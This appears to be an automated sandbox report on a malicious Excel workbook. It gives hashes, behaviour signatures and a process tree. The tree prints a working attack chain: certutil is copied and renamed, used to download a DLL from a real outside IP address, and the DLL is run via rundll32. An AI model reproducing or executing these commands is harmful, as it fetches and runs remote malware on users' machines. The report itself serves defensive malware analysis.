Analysis
-
max time kernel
252s -
max time network
281s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
02-08-2021 09:30
Behavioral task
behavioral1
Sample
cancel_sub_VCP1234567890123.xlsb
Resource
win7v20210410
Behavioral task
behavioral2
Sample
cancel_sub_VCP1234567890123.xlsb
Resource
win10v20210408
General
-
Target
cancel_sub_VCP1234567890123.xlsb
-
Size
123KB
-
MD5
9e1ee4a42c381eabcf2cde38a1aae7c9
-
SHA1
015bb306d9e54001d433b3ac2e7212b864f54ae2
-
SHA256
fd71a2fcc0b5dd0fb0dbff257839b67749f2cadf30e2d3dae7f0e941d93d24d3
-
SHA512
d8955c76657c68542ebcd1fc0b14b69917976892a2005ff0fcace3754200d52c4557235e083b76f4115cc940281dbe77a8e390e8bd18fbe9d5cdb128191580ec
Malware Config
Extracted
Signatures
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.execmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 1540 3128 cmd.exe EXCEL.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 636 3128 cmd.exe EXCEL.EXE -
Executes dropped EXE 1 IoCs
Processes:
TTObk2.exepid process 2264 TTObk2.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 3128 EXCEL.EXE -
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
EXCEL.EXEpid process 3128 EXCEL.EXE 3128 EXCEL.EXE 3128 EXCEL.EXE 3128 EXCEL.EXE 3128 EXCEL.EXE 3128 EXCEL.EXE 3128 EXCEL.EXE 3128 EXCEL.EXE 3128 EXCEL.EXE 3128 EXCEL.EXE 3128 EXCEL.EXE 3128 EXCEL.EXE -
Suspicious use of WriteProcessMemory 8 IoCs
Processes:
EXCEL.EXEcmd.exedescription pid process target process PID 3128 wrote to memory of 1540 3128 EXCEL.EXE cmd.exe PID 3128 wrote to memory of 1540 3128 EXCEL.EXE cmd.exe PID 3128 wrote to memory of 2264 3128 EXCEL.EXE TTObk2.exe PID 3128 wrote to memory of 2264 3128 EXCEL.EXE TTObk2.exe PID 3128 wrote to memory of 636 3128 EXCEL.EXE cmd.exe PID 3128 wrote to memory of 636 3128 EXCEL.EXE cmd.exe PID 636 wrote to memory of 2168 636 cmd.exe rundll32.exe PID 636 wrote to memory of 2168 636 cmd.exe rundll32.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\cancel_sub_VCP1234567890123.xlsb"Checks processor information in registryEnumerates system info in registrySuspicious behavior: AddClipboardFormatListenerSuspicious use of SetWindowsHookExSuspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c mkdir %programdata%\TTObk2 && copy /b %SystemRoot%\System32\certutil.exe %programdata%\TTObk2\TTObk2.exeProcess spawned unexpected child process
-
C:\programdata\TTObk2\TTObk2.exe"C:\programdata\TTObk2\TTObk2.exe" -urlcache -f -split http://195.123.235.51 c:\programdata\TTObk2\TTObk2.dllExecutes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c rundll32 %programdata%\TTObk2\TTObk2.dll,StartWProcess spawned unexpected child processSuspicious use of WriteProcessMemory
-
C:\Windows\system32\rundll32.exerundll32 C:\ProgramData\TTObk2\TTObk2.dll,StartW
Network
MITRE ATT&CK Matrix
Collection
Command and Control
Credential Access
Defense Evasion
Execution
Exfiltration
Impact
Initial Access
Lateral Movement
Persistence
Privilege Escalation
Replay Monitor
Downloads
-
C:\ProgramData\TTObk2\TTObk2.exeMD5
056c7d065f4622da9cc2848f47e2bae2
SHA16c6f18b0ec53dc63488961c4240ec584ac71c25f
SHA256e09a2d7ecac1a10c89e27750a18790da06ddd7311965dbc9ab6096f636dae61c
SHA512db158c9b669a2668149caf30df32595a488dcc831d7518ca2e793eac0885492a2eaee838914e706a585b7f3f1c801e299c697b2cec509204561bb098e16253d5
-
C:\programdata\TTObk2\TTObk2.exeMD5
056c7d065f4622da9cc2848f47e2bae2
SHA16c6f18b0ec53dc63488961c4240ec584ac71c25f
SHA256e09a2d7ecac1a10c89e27750a18790da06ddd7311965dbc9ab6096f636dae61c
SHA512db158c9b669a2668149caf30df32595a488dcc831d7518ca2e793eac0885492a2eaee838914e706a585b7f3f1c801e299c697b2cec509204561bb098e16253d5
-
memory/636-276-0x0000000000000000-mapping.dmp
-
memory/1540-264-0x0000000000000000-mapping.dmp
-
memory/2168-277-0x0000000000000000-mapping.dmp
-
memory/2264-274-0x0000000000000000-mapping.dmp
-
memory/3128-117-0x00007FFA70CE0000-0x00007FFA70CF0000-memory.dmpFilesize
64KB
-
memory/3128-123-0x00007FFA8F4D0000-0x00007FFA913C5000-memory.dmpFilesize
30MB
-
memory/3128-122-0x00007FFA913D0000-0x00007FFA924BE000-memory.dmpFilesize
16MB
-
memory/3128-121-0x00007FFA70CE0000-0x00007FFA70CF0000-memory.dmpFilesize
64KB
-
memory/3128-118-0x00007FFA70CE0000-0x00007FFA70CF0000-memory.dmpFilesize
64KB
-
memory/3128-114-0x00007FF7AA140000-0x00007FF7AD6F6000-memory.dmpFilesize
53MB
-
memory/3128-116-0x00007FFA70CE0000-0x00007FFA70CF0000-memory.dmpFilesize
64KB
-
memory/3128-115-0x00007FFA70CE0000-0x00007FFA70CF0000-memory.dmpFilesize
64KB